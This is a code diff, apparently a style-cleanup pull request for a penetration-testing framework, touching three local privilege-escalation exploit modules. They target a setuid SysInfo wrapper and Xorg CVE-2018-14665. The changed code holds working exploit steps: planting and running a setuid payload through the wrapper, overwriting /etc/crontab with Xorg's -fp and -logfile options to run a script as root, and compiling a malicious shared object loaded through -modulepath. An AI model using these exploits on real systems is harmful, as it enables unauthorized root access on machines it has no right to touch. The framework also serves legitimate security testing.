+      OptString.new('SYSINFO_DIR', [ true, 'Path to SysInfo directory', '/opt/sysinfo' ]),
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
   end
 
   def sysinfo_dir
@@ -69,63 +71,39 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless cmd_exec("test -d #{sysinfo_dir} && echo true").include? 'true'
-      vprint_good "Directory '#{sysinfo_dir}' does not exist"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("Directory '#{sysinfo_dir}' does not exist") unless directory?(sysinfo_dir)
+
     vprint_good "Directory '#{sysinfo_dir}' exists"
 
     mcsiwrapper_path = "#{sysinfo_dir}/bin/.mcsiwrapper"
-    unless setuid? mcsiwrapper_path
-      vprint_error "#{mcsiwrapper_path} is not setuid"
-      return CheckCode::Safe
-    end
-    vprint_good "#{mcsiwrapper_path} is setuid"
+    return CheckCode::Safe("#{mcsiwrapper_path} is not setuid") unless setuid?(mcsiwrapper_path)
 
-    bash_path = cmd_exec 'which bash'
-    unless bash_path.start_with?('/') && bash_path.include?('bash')
-      vprint_error 'bash is not installed. Exploitation will fail.'
-      return CheckCode::Safe
-    end
-    vprint_good 'bash is installed'
+    vprint_good("#{mcsiwrapper_path} is setuid")
 
-    config_version = cmd_exec "grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg"
+    bash_path = cmd_exec('which bash')
+    return CheckCode::Safe('bash is not installed. Exploitation will fail.') unless bash_path.start_with?('/') && bash_path.include?('bash')
+
+    vprint_good('bash is installed')
+
+    config_version = cmd_exec("grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg")
     version = config_version.scan(/^ProdVersion=(\d+-H\d+|\d+-GA)$/).flatten.first
-    if version.blank?
-      vprint_error 'Could not determine the SysInfo version'
-      return CheckCode::Detected
-    end
-    if Rex::Version.new(version.sub('-H', '.')) >= Rex::Version.new('10.64')
-      vprint_error "SysInfo version #{version} is not vulnerable"
-      return CheckCode::Safe
-    end
-    vprint_good "SysInfo version #{version} is vulnerable"
+    return CheckCode::Detected('Could not determine the SysInfo version') if version.blank?
+    return CheckCode::Safe("SysInfo version #{version} is not vulnerable") if Rex::Version.new(version.sub('-H', '.')) >= Rex::Version.new('10.64')
 
-    CheckCode::Vulnerable
+    CheckCode::Appears("SysInfo version #{version} is vulnerable")
   end
 
   def upload(path, data)
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
-    write_file path, data
-    register_file_for_cleanup path
-  end
-
-  def mkdir(path)
-    vprint_status "Creating '#{path}' directory"
-    cmd_exec "mkdir -p #{path}"
-    register_dir_for_cleanup path
+    rm_f(path)
+    write_file(path, data)
+    register_file_for_cleanup(path)
   end
 
   def exploit
-    check_status = check
-    if check_status != CheckCode::Vulnerable && check_status != CheckCode::Detected
-      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
-    end
-
     # Set target
-    uname = cmd_exec 'uname'
-    vprint_status "Operating system is #{uname}"
+    uname = cmd_exec('uname')
+    vprint_status("Operating system is #{uname}")
     if target.name.eql? 'Automatic'
       case uname
       when /SunOS/i
@@ -133,39 +111,39 @@ class MetasploitModule < Msf::Exploit::Local
       when /Linux/i
         my_target = targets[2]
       else
-        fail_with Failure::NoTarget, 'Unable to automatically select a target'
+        fail_with(Failure::NoTarget, 'Unable to automatically select a target')
       end
     else
       my_target = target
     end
-    print_status "Using target: #{my_target.name}"
+    print_status("Using target: #{my_target.name}")
 
     # Check payload
     if (my_target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
        (my_target['Platform'].eql?('solaris') && payload_instance.name !~ /solaris/i)
-      fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{my_target.name}'"
+      fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{my_target.name}'")
     end
 
     # Create a working directory
-    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric rand(5..10)}"
-    mkdir base_path
+    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
+    mkdir(base_path)
 
     # Write config file
-    config_path = "#{base_path}/#{rand_text_alphanumeric rand(5..10)}"
-    upload config_path, "ExecPath=#{base_path}"
+    config_path = "#{base_path}/#{rand_text_alphanumeric(5..10)}"
+    upload(config_path, "ExecPath=#{base_path}")
 
     # Upload payload
-    payload_name = rand_text_alphanumeric rand(5..10)
+    payload_name = rand_text_alphanumeric(5..10)
     payload_path = "#{base_path}/#{payload_name}"
-    upload payload_path, generate_payload_exe
-    cmd_exec "chmod u+sx '#{payload_path}'"
+    upload(payload_path, generate_payload_exe)
+    cmd_exec("chmod u+sx '#{payload_path}'")
 
-    print_status 'Executing payload...'
+    print_status('Executing payload...')
 
     # Executing .mcsiwrapper directly errors:
     #   Command ".mcsiwrapper" cannot start with `.' or contain `/'.
     # Instead, we execute with bash to replace ARGV[0] with the payload file name
-    output = cmd_exec "bash -c \"exec -a #{payload_name} #{sysinfo_dir}/bin/.mcsiwrapper --configfile #{config_path}&\""
+    output = cmd_exec("bash -c \"exec -a #{payload_name} #{sysinfo_dir}/bin/.mcsiwrapper --configfile #{config_path}&\"")
     output.each_line { |line| vprint_status line.chomp }
   end
 end

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -87,6 +87,11 @@ class MetasploitModule < Msf::Exploit::Local
           'WfsDelay' => 120
         },
         'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -108,60 +113,58 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     # linux checks
-    uname = cmd_exec "uname"
+    uname = cmd_exec('uname')
     if uname =~ /linux/i
-      vprint_status "Running additional check for Linux"
+      vprint_status 'Running additional check for Linux'
       if datastore['ConsoleLock']
-        user = cmd_exec "id -un"
-        unless exist? "/var/run/console/#{user}"
-          vprint_error "No console lock for #{user}"
+        user = cmd_exec('id -un')
+        unless exist?("/var/run/console/#{user}")
+          vprint_error("No console lock for #{user}")
           return CheckCode::Safe
         end
-        vprint_good "Console lock for #{user}"
+        vprint_good("Console lock for #{user}")
       end
-      if selinux_installed?
-        if selinux_enforcing?
-          vprint_error 'Selinux is enforcing'
-          return CheckCode::Safe
-        end
-      end
-      vprint_good "Selinux is not an issue"
+
+      return CheckCode::Safe('SELinux is enforcing') if selinux_installed? && selinux_enforcing?
+
+      vprint_good('SELinux is not an issue')
     end
 
     # suid program check
-    xorg_path = cmd_exec "command -v Xorg"
-    unless xorg_path.include?("Xorg")
-      vprint_error "Could not find Xorg executable"
-      return CheckCode::Safe
+    xorg_path = cmd_exec('command -v Xorg')
+    unless xorg_path.include?('Xorg')
+      return CheckCode::Safe('Could not find Xorg executable')
     end
-    vprint_good "Xorg path found at #{xorg_path}"
-    unless setuid? xorg_path
-      vprint_error "Xorg binary #{xorg_path} is not SUID"
-      return CheckCode::Safe
+
+    vprint_good("Xorg path found at #{xorg_path}")
+
+    unless setuid?(xorg_path)
+      return CheckCode::Safe("Xorg binary #{xorg_path} is not SUID")
     end
-    vprint_good "Xorg binary #{xorg_path} is SUID"
+
+    vprint_good("Xorg binary #{xorg_path} is SUID")
 
     # version check
-    x_version = cmd_exec "Xorg -version"
-    if x_version.include?("Release Date")
+    x_version = cmd_exec 'Xorg -version'
+    if x_version.include?('Release Date')
       v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
       unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
         vprint_error "Xorg version #{v} not supported"
         return CheckCode::Safe
       end
-    elsif x_version.include?("Fatal server error")
-      vprint_error "User probably does not have console auth"
-      vprint_error "Below is Xorg -version output"
+    elsif x_version.include?('Fatal server error')
+      vprint_error 'User probably does not have console auth'
+      vprint_error 'Below is Xorg -version output'
       vprint_error x_version
       return CheckCode::Safe
     else
-      vprint_warning "Could not parse Xorg -version output"
+      vprint_warning('Could not parse Xorg -version output')
       return CheckCode::Appears
     end
-    vprint_good "Xorg version #{v} is vulnerable"
+    vprint_good("Xorg version #{v} is vulnerable")
 
     # process check for /X
-    proc_list = cmd_exec "ps ax"
+    proc_list = cmd_exec 'ps ax'
     if proc_list.include?('/X ')
       vprint_warning('Xorg in process list')
       return CheckCode::Appears
@@ -177,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Local
     else
       session.shell_command(@clean_up)
     end
-    print_good "Returning session after cleaning"
+    print_good 'Returning session after cleaning'
   ensure
     super
   end
@@ -220,7 +223,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status 'Trying /etc/crontab overwrite'
     cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
     Rex.sleep 5
-    cmd_exec "pkill Xorg"
+    cmd_exec 'pkill Xorg'
     Rex.sleep 1
     cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
     unless cron_check.include? pscript

--- a/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb
@@ -12,121 +12,137 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Kernel
   include Msf::Post::Linux::System
 
-
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Xorg X11 Server SUID modulepath Privilege Escalation',
-      'Description'    => %q{
-        This module attempts to gain root privileges with SUID Xorg X11 server
-        versions 1.19.0 < 1.20.3.
+    super(
+      update_info(
+        info,
+        'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation',
+        'Description' => %q{
+          This module attempts to gain root privileges with SUID Xorg X11 server
+          versions 1.19.0 < 1.20.3.
 
-        A permission check flaw exists for -modulepath and -logfile options when
-        starting Xorg.  This allows unprivileged users that can start the server
-        the ability to elevate privileges and run arbitrary code under root
-        privileges.
+          A permission check flaw exists for -modulepath and -logfile options when
+          starting Xorg.  This allows unprivileged users that can start the server
+          the ability to elevate privileges and run arbitrary code under root
+          privileges.
 
-        This module has been tested with CentOS 7 (1708).
-        CentOS default install will require console auth for the users session.
-        Xorg must have SUID permissions and may not start if running.
+          This module has been tested with CentOS 7 (1708).
+          CentOS default install will require console auth for the users session.
+          Xorg must have SUID permissions and may not start if running.
 
-        On successful exploitation artifacts will be created consistant
-        with starting Xorg.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          On successful exploitation artifacts will be created consistant
+          with starting Xorg.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Narendra Shinde', # Discovery and exploit
-          'Aaron Ringo',     # Metasploit module
+          'Aaron Ringo', # Metasploit module
         ],
-      'DisclosureDate' => '2018-10-25',
-      'References'     =>
-        [
-           [ 'CVE', '2018-14665' ],
-           [ 'BID', '105741' ],
-           [ 'EDB', '45697' ],
-           [ 'EDB', '45742' ],
-           [ 'EDB', '45832' ],
-           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]
+        'DisclosureDate' => '2018-10-25',
+        'References' => [
+          [ 'CVE', '2018-14665' ],
+          [ 'BID', '105741' ],
+          [ 'EDB', '45697' ],
+          [ 'EDB', '45742' ],
+          [ 'EDB', '45832' ],
+          [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]
         ],
-      'Platform'       =>  %w[linux unix solaris],
-      'Arch'           =>  [ARCH_X86, ARCH_X64],
-      'SessionTypes'   =>  %w[shell meterpreter],
-      'Targets'        =>
-        [
-           ['Linux x64', {
-            'Platform' => 'linux',
-            'Arch' => ARCH_X64 } ],
-           ['Linux x86', {
-            'Platform' => 'linux',
-            'Arch' => ARCH_X86 } ],
-           ['Solaris x86', {
-            'Platform' => [ 'solaris', 'unix' ],
-            'Arch' => ARCH_SPARC } ],
-           ['Solaris x64', {
-            'Platform' => [ 'solaris', 'unix' ],
-            'Arch' => ARCH_SPARC } ],
+        'Platform' => %w[linux unix solaris],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'SessionTypes' => %w[shell meterpreter],
+        'Targets' => [
+          [
+            'Linux x64', {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64
+            }
+          ],
+          [
+            'Linux x86', {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [
+            'Solaris x86', {
+              'Platform' => [ 'solaris', 'unix' ],
+              'Arch' => ARCH_SPARC
+            }
+          ],
+          [
+            'Solaris x64', {
+              'Platform' => [ 'solaris', 'unix' ],
+              'Arch' => ARCH_SPARC
+            }
+          ],
         ],
-      'DefaultTarget'  => 0))
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
 
-     register_advanced_options(
-       [
-         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
-         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),
-         OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])
-       ]
-     )
+    register_advanced_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+        OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
+        OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),
+        OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])
+      ]
+    )
   end
-
 
   def check
     # linux checks
-    uname = cmd_exec "uname"
+    uname = cmd_exec('uname')
     if uname =~ /linux/i
-      vprint_status "Running additional check for Linux"
+      vprint_status 'Running additional check for Linux'
       if datastore['ConsoleLock']
-        user = cmd_exec "id -un"
-        unless exist? "/var/run/console/#{user}"
-          vprint_error "No console lock for #{user}"
+        user = cmd_exec('id -un')
+        unless exist?("/var/run/console/#{user}")
+          vprint_error("No console lock for #{user}")
           return CheckCode::Safe
         end
-        vprint_good "Console lock for #{user}"
+        vprint_good("Console lock for #{user}")
       end
     end
 
     # suid program check
-    xorg_path = cmd_exec "command -v Xorg"
-    unless xorg_path.include?("Xorg")
-      vprint_error "Could not find Xorg executable"
-      return CheckCode::Safe
+    xorg_path = cmd_exec('command -v Xorg')
+    unless xorg_path.include?('Xorg')
+      return CheckCode::Safe('Could not find Xorg executable')
     end
-    vprint_good "Xorg path found at #{xorg_path}"
-    unless setuid? xorg_path
-      vprint_error "Xorg binary #{xorg_path} is not SUID"
-      return CheckCode::Safe
-    end
-    vprint_good "Xorg binary #{xorg_path} is SUID"
 
-    x_version = cmd_exec "Xorg -version"
-    if x_version.include?("Release Date")
+    vprint_good("Xorg path found at #{xorg_path}")
+
+    unless setuid? xorg_path
+      return CheckCode::Safe("Xorg binary #{xorg_path} is not SUID")
+    end
+
+    vprint_good("Xorg binary #{xorg_path} is SUID")
+
+    x_version = cmd_exec 'Xorg -version'
+    if x_version.include?('Release Date')
       v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
       unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
-        vprint_error "Xorg version #{v} not supported"
-        return CheckCode::Safe
+        return CheckCode::Safe("Xorg version #{v} not supported")
       end
-    elsif x_version.include?("Fatal server error")
-      vprint_error "User probably does not have console auth"
-      vprint_error "Below is Xorg -version output"
+    elsif x_version.include?('Fatal server error')
+      vprint_error 'User probably does not have console auth'
+      vprint_error 'Below is Xorg -version output'
       vprint_error x_version
       return CheckCode::Safe
     else
-      vprint_warning "Could not parse Xorg -version output"
+      vprint_warning('Could not parse Xorg -version output')
       return CheckCode::Appears
     end
-    vprint_good "Xorg version #{v} is vulnerable"
+    vprint_good("Xorg version #{v} is vulnerable")
 
     # process check for /X
-    proc_list = cmd_exec "ps ax"
+    proc_list = cmd_exec 'ps ax'
     if proc_list.include?('/X ')
       vprint_warning('Xorg in process list')
       return CheckCode::Appears
@@ -136,7 +152,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check_arch_and_compile(path, data)
-    cpu = ''
     if target['Arch'] == ARCH_X86
       cpu = Metasm::Ia32.new
       compile_with_metasm(cpu, path, data)
@@ -153,8 +168,8 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(path, shared_obj)
     register_file_for_cleanup path
 
-    chmod path
-  rescue
+    chmod(path)
+  rescue StandardError
     print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')
     compile_with_gcc(path, data)
   end
@@ -188,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Local
     check_status = check
     if check_status == CheckCode::Appears
       print_warning 'Could not get version or Xorg process possibly running, may fail'
-    elsif check_status ==  CheckCode::Safe
+    elsif check_status == CheckCode::Safe
       fail_with Failure::NotVulnerable, 'Target not vulnerable'
     end
 
@@ -207,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Local
     pscript = "#{modulepath}/.session-#{rand_text_alphanumeric 5..10}"
     xdisplay = datastore['Xdisplay']
 
-    stub = %Q^
+    stub = %^
 extern int setuid(int);
 extern int setgid(int);
 extern int system(const char *__s);
@@ -233,14 +248,13 @@ system("#{pscript} &");
     chmod pscript
     register_file_for_cleanup pscript
 
-
     # Actual exploit with cron overwrite
     print_status 'Exploiting'
-    #Xorg -logfile derp -modulepath ',/tmp' :1
+    # Xorg -logfile derp -modulepath ',/tmp' :1
     xorg_cmd = "Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null"
     cmd_exec xorg_cmd
     Rex.sleep 7
-    cmd_exec "pkill Xorg"
+    cmd_exec 'pkill Xorg'
     Rex.sleep 1
   end
 end


### PR DESCRIPTION
Resolves violations. Adds notes.

Also removes redundant bespoke code in a few instances where we now have Post library functions (`mkdir`, `directory?`, ...).

Also adds `AutoCheck` to one module which was manually calling `check` and checking the returned CheckCode.
